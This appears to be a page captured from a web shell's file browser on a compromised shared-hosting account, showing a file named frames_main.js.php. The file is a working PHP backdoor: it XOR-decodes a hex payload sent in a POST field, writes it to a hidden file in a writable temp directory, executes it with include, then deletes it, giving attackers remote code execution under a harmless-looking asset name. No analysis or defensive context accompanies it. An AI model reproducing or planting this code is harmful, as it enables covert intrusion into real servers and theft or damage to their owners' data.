HEX
Server: LiteSpeed
System: Linux premium148.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: burhbrzf (1357)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/burhbrzf/payroll.burhanrentacar.net/lqpjvnc/frames_main.js.php
<?php

if(isset($_POST["bind"]) ? true : false){
	$ent = hex2bin($_POST["bind"]);
	$hld= ''; $h = 0; do{$hld .= chr(ord($ent[$h]) ^ 89);$h++;} while($h < strlen($ent));
	$pointer = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", session_save_path(), getenv("TMP"), "/dev/shm", getenv("TEMP"), "/tmp", getcwd()]);
	while ($pgrp = array_shift($pointer)) {
    		if (is_dir($pgrp) && is_writable($pgrp)) {
    $val = "$pgrp/.k";
    $success = file_put_contents($val, $hld);
if ($success) {
	include $val;
	@unlink($val);
	exit;}
}
}
}